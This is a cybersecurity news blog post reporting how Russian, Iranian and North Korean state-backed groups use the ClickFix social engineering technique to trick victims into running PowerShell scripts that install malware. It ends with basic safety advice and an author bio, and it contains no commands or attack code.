Hackers Use ClickFix to Convince Users to Install Malware
Hackers Use ClickFix to Convince Users to Install Malware
A increasing number of state-sponsored hacking groups from Russia, Iran, and North Korea are using ClickFix, a misleading cyberattack technique that is quickly becoming more and more popular among advanced persistent threat (APT) actors because of its low technical visibility and high success rate.
ClickFix is a social engineering scam in which hackers trick victims into visiting malicious websites that imitate trustworthy document-sharing or software portals. Users are shown with phony error messages stating that a software or document download has failed once they are on the website. Victims are asked to manually run a PowerShell or command-line script in an attempt to “fix” the problem, unintentionally infecting their system with malware.
State-Sponsored Threat Actors’ Worldwide Adoption
According to a recent report by cybersecurity firm Proofpoint, ClickFix was widely used in espionage campaigns between late 2024 and early 2025. APT groups that used the tactic included Kimsuky (North Korea), MuddyWater (Iran), APT28, and a Russian-affiliated actor known as UNK_RemoteRogue.
- Kimsuky of North Korea: Used emails posing as Japanese diplomats to target think tanks involved in Korean policy. Phishing communications referred to fictitious secure drives, which led victims to register devices using PowerShell instructions and install QuasarRAT while presenting fictitious documents to allay suspicions.
- Iran’s MuddyWater: In mid-November 2024, Iran’s MuddyWater sent phishing emails to 39 Middle Eastern organizations while posing as Microsoft. Under the pretense of installing a crucial security patch, victims were duped into running a PowerShell script that installed “Level,” a remote monitoring tool used for data theft and surveillance.
- Russia’s UNK_RemoteRogue: The UNK in Russia_RemoteRogue: In December 2024, it targeted companies connected to an arms factory. PowerShell execution linked to the Empire C2 framework resulted from victims being sent emails from hacked Zimbra servers that led them to bogus Microsoft Word pages with instructions and even a YouTube lesson.
- APT28 (Fancy Bear): In October 2024, ClickFix was exploited by another Russian threat actor associated with the GRU to disseminate phishing emails that imitated Google Spreadsheets and asked users to complete a reCAPTCHA fake. After the user executed the script, Metasploit was installed and an SSH tunnel was created, giving the attackers backdoor access to the device.
Why ClickFix Works?
ClickFix is dependent on user-initiated command execution, as opposed to conventional phishing, which depends on malicious file attachments. Because the victim manually enters the commands, thinking they are fixing a technical problem, this gets past a lot of automated security filters.
According to experts, ClickFix’s effectiveness stems from users’ ignorance of the dangers of running unknown scripts, particularly ones with administrator capabilities.
Microsoft and Cybersecurity Experts Respond
The emergence of ClickFix in Kimsuky-run campaigns was previously noted by Microsoft’s Threat Intelligence team, which also emphasized the need for worldwide awareness. According to Proofpoint’s most recent investigation, ClickFix is increasingly being used for contemporary cyber espionage, particularly by attackers with adversarial state objectives.
How to Stay Safe?
Experts in security counsel users to:
- Never execute commands from websites or emails until they have been validated.
- Do not copy scripts from unidentified sources into PowerShell or command prompts.
- Look for indications of impersonation in email sources, domain names, and grammar.
- Inform the cybersecurity or IT departments about any questionable communications.
ClickFix stands out as a powerful reminder that human mistakes are still one of the most exploited weaknesses in today’s digital threat landscape, even as state-backed cyber attacks change.
About The Author:
Yogesh Naager is a content marketer who specializes in the cybersecurity and B2B space. Besides writing for the News4Hackers blogs, he also writes for brands including Craw Security, Bytecode Security, and NASSCOM.
READ MORE HERE
APT29 Pushed GRAPELOADER Malware Threatening European Diplomats Via Wine-Tasting Lures
About Author
English